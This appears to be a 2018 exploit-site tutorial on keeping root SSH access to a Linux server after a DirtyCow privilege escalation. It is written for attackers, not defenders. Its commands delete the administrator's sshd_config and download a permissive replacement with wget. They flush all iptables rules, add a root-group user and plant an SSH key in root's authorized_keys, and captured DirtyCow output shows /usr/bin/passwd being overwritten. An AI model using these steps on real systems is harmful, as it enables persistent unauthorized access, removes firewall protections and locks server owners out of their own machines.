facebook facebook twitter rss

Get SSH Access After Rooting the Server

Author: Rednofozi , Published: 15-10-2018
|--------------------------------------------------------------|                                          
|--------------------------------------------------------------|
|[+] Exploit Title: Get SSH Access After Rooting the Server
|[+] Date:14/10/2018
|[+] Exploit Author :Rednofozi
|[+] Tested on: : Windows 10 , parrot os
|[+] MY page https://cxsecurity.com/author/Inj3ct0r
|[+] MY page http://www.exploit4arab.org/author/308/Rednofozi
|[+] ME:Rednfozi@yahoo.com
|[+] ME:Rednofozi@hotmail.com
|[+] ME:inj3ct0r@tuta.io
|[+] fb.me :https://www.facebook.com/saeid.hat.3
|--------------------------------------------------------------|
|[+] RHG hackers iran team
################################################################
.. this time I want to share a few tips, maybe some of you don't know. Normally those who have rooting the server with localroot dirtyc0w often have already escalated, add the user and change the password so that they cannot enter ssh because the ssh port is replaced, or the auth password is turned off (the sysadmin server is logged in using auth key). There are also cases where the privilege escalation process directly calls tty with the root id, but when adding a user it cannot because access to commands such as iptables passwd, etc. is restricted.
Okay, we discussed the first case first.
dirty cow exploit - execution of localroot - change user and password - can't enter ssh.
There are two possibilities, not allowed to login with a password, or indeed ssh can only be accessed via certain IPs (iptables settings).
The trick:
......
su firefat
cd /etc/ssh/
rm sshd_config
wget https://raw.githubusercontent.com/linuxsec/pentest/master/sshd.txt -O sshd_config
iptables -F
service ssh restart

........
The command above will delete the ssh configuration that the sysadmin does and return it to the default settings where the login password is allowed and the port is on port 22. iptables -F is doing iptables flushing. This is to delete all existing iptables rules. So for example the initial rule only allows certain ips to log in to ssh, now we can log in to ssh from our ip.
The first above is the easiest case. Now the second one is quite a lot too
dirty cow exploit - execution of localroot - change user and password - can't enter ssh - / bin / su denied
Now if this one, we use the following trick.
We do server escalation with localroot which directly calls tty with root id.
So the process becomes
exploit - run - root id
log:
/ cowroot
Escalation of privileged root privileges from DirtyCow
Backup / usr / bin / passwd to / tmp / bak
Binary size: 30768
Race, this might take time ...
/ usr / bin / passwd is overwritten
Popping root shell.
Don't forget to recover / tmp / bak
thread stops
thread stops
root @ whmdaqu [/ home / bugs / public_html /] #

because our id is now root we just follow the command in the first case. Reset sshd config, iptables flush, add root equivalent user.
Well the third case
exploit - tty with root id - cannot execute the passwd, iptables and other commands.
It is possible that access to system commands is limited when we use tty.
Log:

root @ server [/ root] # / usr / sbin / useradd dick -g root -d / home / dick
/ usr / sbin / useradd dick -g root -d / home / dick
root @ server [/ root] # passwd dick
passwd root
root @ server [/ root] #

yup, the password prompt doesn't want to be called.
This is because access to tty is limited. even if we have a root ID we cannot run the iptables command.
The trick I tried and worked on:

cd ~
ssh-keygen -t rsa
cp /root/.ssh/id_rsa.pub /root/.ssh/authorized_keys
ssh root @ localhost

We use SSH access using auth key. Why on localhost, why doesn't it directly use auth key from our server? Here I assume the target server firewall is active and only allows SSH access from certain IPs.
After adding ssh key, the following log:

root @ server [~] # ssh root @ localhost
ssh dick @ localhost
Attempting to create directory / root / perl5
root @ server [~] #

It looks the same but the first is tty, and the second is ssh shell.
Now because what we have is no longer a limit or the limit of the command such as the iptables command cannot, the command passwd is gone. Then just follow the top fig.
So this tutorial, hopefully useful.
-----------------------------------------------------------------------------------
----------------------------------------------------------------------------------
# Discovered by : inj3ct0r and Rednofozi

#--tnx to : ReZa CLONER , Moeein Seven. Rednofozi

Like us on Facebook :